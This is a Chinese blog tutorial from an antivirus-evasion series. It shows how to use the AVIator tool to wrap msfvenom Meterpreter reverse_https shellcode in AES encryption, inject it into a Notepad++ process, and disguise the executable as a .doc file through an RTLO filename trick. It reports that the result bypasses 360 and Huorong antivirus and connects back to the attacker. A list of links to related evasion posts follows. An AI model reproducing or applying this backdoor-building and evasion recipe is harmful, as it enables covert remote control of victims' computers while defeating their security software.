远控免杀专题 14 ---AVIator
0x01 免杀能力一览表
几点说明:
1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。
0x02 AVIator介绍
AVIator使用AES加密来加密Shellcode,生成一个包含加密有效负载的可执行文件,然后使用各种注入技术将shellcode解密并注入到目标系统,从而绕过杀毒软件的检测。
0x03 安装AVIator
AVIator只有windows版,c#开发,单文件exe。
安装也非常方便,直接从github上下载下来。
git clone https://github.com/Ch0pin/AVIator
或者直接下载压缩包https://github.com/Ch0pin/AVIator/archive/master.zip
解压后在Compiled Binaries
文件夹中有x86和x64的可执行exe文件,执行即可
使用也非常简单,只需要填入payload后简单设置一下就可以。
0x04 AVIator生成后门
首先要使用msf生成shellceode,需要基于c#,我就用msf生成一个最基础的
msfvenom -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -f csharp -o test11.c
在AVIator中对shellcode进行处理,AES KEY和IV默认就可以
payload地方填入上面生成的test11.c文件内容,然后点击Encrypt,生成加密后的payload。
目标操作系统架构根据实际情况选择就可以,x86比较通用一些。
下面还有个Injection Techniques,需要选择注入技术,我这选择第二个注入Notepad++进程
另外,软件还提供了RTLO选项,可以使可执行文件名看起来伪装性更好。比如,启用该选项后,文件testcod.exe将被保存文件名为testexe.doc,但文件还是可以正常被当做exe执行的。但是,选择了RTLO选项虽然更迷惑人,但也更容易被杀软报警告。
还可以自定义程序ico图标,增强伪装,我这就不配置了
点击generate后就可以生成后门程序了。
不开杀软的时候可正常上线
打开杀软进行测试,可过360和火绒动静态检测
比较诡异的是360安全卫士的行为检测发现木马行为
但火绒和360杀毒没点反应,可正常上线
后来我没启用RTLO选项又生成了一个正常的exe文件,看来RTLO选项影响还挺大。
参考
官方说明文档:https://github.com/Ch0pin/AVIator
远控免杀专题 14 ---AVIator相关推荐
- 远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(9)-Avet免杀(VT免杀率14/71)
本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2.远控免杀专题(2)-msfvenom隐藏的参数: ...
- 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(13)-zirikatu免杀(VT免杀率39/71)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题文章(3)-msf自免杀(VT免杀率35/69)
原文链接:远控免杀专题文章(3)-msf自免杀(VT免杀率35/69) 免杀能力一览表 几点说明: 1.上面表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效 ...
- 远控免杀专题(67)-白名单(113个)总结篇
关于白名单程序 相信大家对白名单程序利用的手法也已经非常熟悉了,白名单程序利用其实是起源于LOLBins,全称"Living-Off-the-Land Binaries",直白翻译 ...
- 远控免杀专题文章(2)-msfvenom隐藏的参数
本专题文章导航 1.远控免杀专题文章(1)-基础篇: 远控免杀专题文章(1)-基础篇 因为cobaltstrike生成payload比较简单,这里不再累述,只是介绍一下msfvenom的基本参数和一些 ...
- 远控免杀专题文章(1)-基础篇
脉搏文库 TideSec [](javascript:void(0)) 2020-02-20 6,218 *前**言* 一直是从事web安全多一些,对waf绕过还稍微有些研究,但是对远控免杀的认知还大 ...
最新文章
- 你为世界杯而战,我为生活而战!
- 第五章--加载内核Kernel.bin
- JavaScript 学习笔记-- ES6学习(一)介绍以及Babel的使用
- Ubuntu 18.04 下安装pip3及pygame模块
- ubuntu下 windows的zip文件打开,中文目录和文件名乱码
- SkyDrive Explorer 把微软25GB网络硬盘搬进“我的电脑”
- (转)Hibernate框架基础——映射普通属性
- 基于Vue2.x的小米商城移动端项目
- SQL float 保留两位小数
- 樊昌信 通信原理第七版 第九章思考题
- 360浏览器导出Excel闪退BUG
- 如何用idftp遍历整个目录----下载、删除_delphi教程
- 【2】输入俩个数m,n,字符串st1为1-m组成,输出字符串的倒数第n个字符
- 国际信用卡VISA/MasterCard/AE/DC/JCB 卡号结构
- python 性能问题_Python 性能问题一直饱受诟病,这篇我们讨论下提升 Python 应用性能的常见方法。...
- MacVim配置文件
- AOSP、AOKP、CM ROM 究竟有哪些区别
- Excel 表格实现多列排序
- 有趣python小程序系列之一
- 护眼灯有用吗?双十二买什么样的护眼灯真的有效果